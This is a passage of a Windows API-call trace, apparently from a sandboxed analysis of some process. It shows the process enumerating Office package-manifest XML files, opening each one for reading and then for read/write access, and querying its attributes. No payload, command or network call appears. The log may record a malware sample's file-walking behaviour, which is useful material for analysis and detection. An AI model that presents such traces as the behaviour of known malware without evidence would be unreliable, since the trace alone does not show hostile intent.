InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.816] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x89640 | out: hHeap=0x20000) returned 1 [0098.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0098.816] AreFileApisANSI () returned 1 [0098.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 105 [0098.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0098.816] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.816] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0098.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0098.816] AreFileApisANSI () returned 1 [0098.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75cd8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75cd8, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml") returned 105 [0098.817] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0027-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0098.942] GetFileType (hFile=0x418) returned 0x1 [0098.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.943] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0098.943] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0098.943] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0098.943] CloseHandle (hObject=0x418) returned 1 [0098.943] AreFileApisANSI () returned 1 [0098.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75cd8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.943] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75cd8, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml") returned 105 [0098.943] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0027-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0098.943] GetFileType (hFile=0x418) returned 0x1 [0098.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.944] CloseHandle (hObject=0x418) returned 1 [0098.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0098.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0098.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0098.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0098.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0098.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0098.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0098.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0098.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0098.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0098.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0098.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0098.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0098.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0098.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0098.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0098.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0098.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0098.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0098.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0098.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0098.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0098.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0098.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0098.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0098.945] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0098.945] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0098.945] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0098.945] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0098.945] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0098.945] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0098.945] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0098.945] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0098.945] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0098.945] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0098.945] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0098.945] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0098.945] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0098.945] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0098.945] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0098.945] AreFileApisANSI () returned 1 [0098.945] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75cd8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.945] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.945] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75cd8, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml") returned 105 [0098.945] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0027-0000-1000-0000000ff1ce.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf982bd9c, ftCreationTime.dwHighDateTime=0x1d47c33, ftLastAccessTime.dwLowDateTime=0xf982bd9c, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0xf982bd9c, ftLastWriteTime.dwHighDateTime=0x1d47c33, nFileSizeHigh=0x0, nFileSizeLow=0x34b4b)) returned 1 [0098.945] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.945] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0098.945] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0098.945] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0098.945] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.945] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.945] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x8394994f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8394994f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83e3474a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ed, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml", cAlternateFileName="APF26A~1.XML")) returned 1 [0098.945] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0098.945] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e308 [0098.945] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0098.945] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69210 [0098.945] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e308 | out: hHeap=0x20000) returned 1 [0098.945] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46208 [0098.945] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69210 | out: hHeap=0x20000) returned 1 [0098.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8c8f0 [0098.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46208 | out: hHeap=0x20000) returned 1 [0098.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0098.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0098.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0098.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0098.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0098.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c8f0 | out: hHeap=0x20000) returned 1 [0098.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0098.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0098.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0098.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0098.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0098.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0098.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351d0 [0098.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0098.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351d0 | out: hHeap=0x20000) returned 1 [0098.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0098.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0098.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0098.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x890d0 [0098.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0098.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0098.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x89388 [0098.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x890d0 | out: hHeap=0x20000) returned 1 [0098.946] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.946] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.946] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.946] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x89388 | out: hHeap=0x20000) returned 1 [0098.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0098.946] AreFileApisANSI () returned 1 [0098.946] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 105 [0098.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0098.946] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.946] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0098.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0098.947] AreFileApisANSI () returned 1 [0098.947] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75c60, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.947] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75c60, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml") returned 105 [0098.947] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-002c-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0098.948] GetFileType (hFile=0x418) returned 0x1 [0098.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.948] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0098.948] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0098.948] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0098.948] CloseHandle (hObject=0x418) returned 1 [0098.948] AreFileApisANSI () returned 1 [0098.948] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75c60, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75c60, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml") returned 105 [0098.949] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-002c-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0098.949] GetFileType (hFile=0x418) returned 0x1 [0098.949] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.949] CloseHandle (hObject=0x418) returned 1 [0098.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0098.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0098.949] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.949] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.949] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0098.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0098.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0098.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0098.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0098.949] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0098.949] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0098.949] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0098.949] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0098.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0098.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0098.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0098.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0098.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0098.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0098.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0098.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0098.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0098.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0098.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0098.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0098.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0098.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0098.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0098.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0098.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0098.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0098.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0098.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0098.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0098.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0098.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0098.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0098.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0098.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0098.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0098.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0098.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0098.950] AreFileApisANSI () returned 1 [0098.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75c60, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75c60, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml") returned 105 [0098.950] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-002c-0409-1000-0000000ff1ce.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x8394994f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8394994f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83e3474a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ed)) returned 1 [0098.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0098.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 